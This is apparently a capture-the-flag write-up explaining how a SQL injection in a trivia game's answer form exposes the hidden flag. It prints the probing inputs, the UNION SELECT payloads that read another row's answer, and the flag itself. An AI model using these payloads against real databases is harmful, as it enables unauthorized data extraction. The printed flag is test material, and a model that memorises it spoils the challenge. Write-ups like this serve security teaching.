Super Quick Logic Invitational

Challenge Overview

This new trivia game is pretty fun, but one of the challenges is impossible! "What is the flag for this CTF challenge?", how would I know?! Maybe you'll fare better?

This is the challenge description. From that we can assume that the answer of the final question is the flag itself.

Entering on the main page of the website, we see some information and this line stand out to me:

• 201 unique problems to solve each game, you'll never believe what's the answer to challenge 201!

I clicked 'Start Game' and I got 30 seconds for each problem like this one: "What is the largest prime factor of 4913?". Obviously, a bruteforce script for all 201 questions wouldn't be logical as we don't know the answer (the flag) of the question with id number 201. However, after the 30 seconds I was redirected to /game_end endpoint. (remember that for later)

---

Exploitation

Writing ' in the form instead of answering the question reveals the vulnerability: SQLi

Error: unrecognized token: "'''" Query:

SELECT * FROM problems WHERE id = 27 AND answer = '''

Note: Our injected payload is between ' '.

Even more, we've got the Query so now we can play with it.

The first logical approach of this is to find the number of columns from the table problems. We can do that using ' ORDER BY .. method. So I tried:

' ORDER BY 1 -- => incorrect
' ORDER BY 2 -- => incorrect 
' ORDER BY 3 -- => incorrect
' ORDER BY 4 -- => incorrect
' ORDER BY 5 -- => Error: 1st ORDER BY term out of range - should be between 1 and 4

Note: ORDER BY is used to determine the number of columns in the query result by increasing the index until an error occurs.

We found the number of columns: 4.

Next step is to inject some junk values and see where they are injected.

' UNION SELECT 1,2,3,4 --  => Correct. +50 points

in /game_end endpoint we've got:

injection area

We see that 3 (3d column) is injected there, that means we should have a payload like this:

' UNION SELECT 1,2,FLAG,3 -- 

---

Final Payload

' UNION SELECT 1,2,(SELECT answer FROM problems WHERE id=201),4 --

OR

' UNION SELECT null,null,answer,null FROM problems WHERE id=201 --

and many more variants.

And we got:

Answer: MetaCTF{wh4t_1s_7h3_fl4g_f0r_7hi5_ch5l1eng3}

And Final Query should be:

SELECT * FROM problems WHERE id = 27 AND answer = '' UNION SELECT 1,2,(SELECT answer FROM problems WHERE id=201),4 --'

Note: UNION combines two queries. The first one returns nothing as there is no problem with answer ''. The second one though, return 1, 2, the FLAG, and 4. Based on our analysis, only the flag (3rd column) is shown on the website, to the specific endpoint.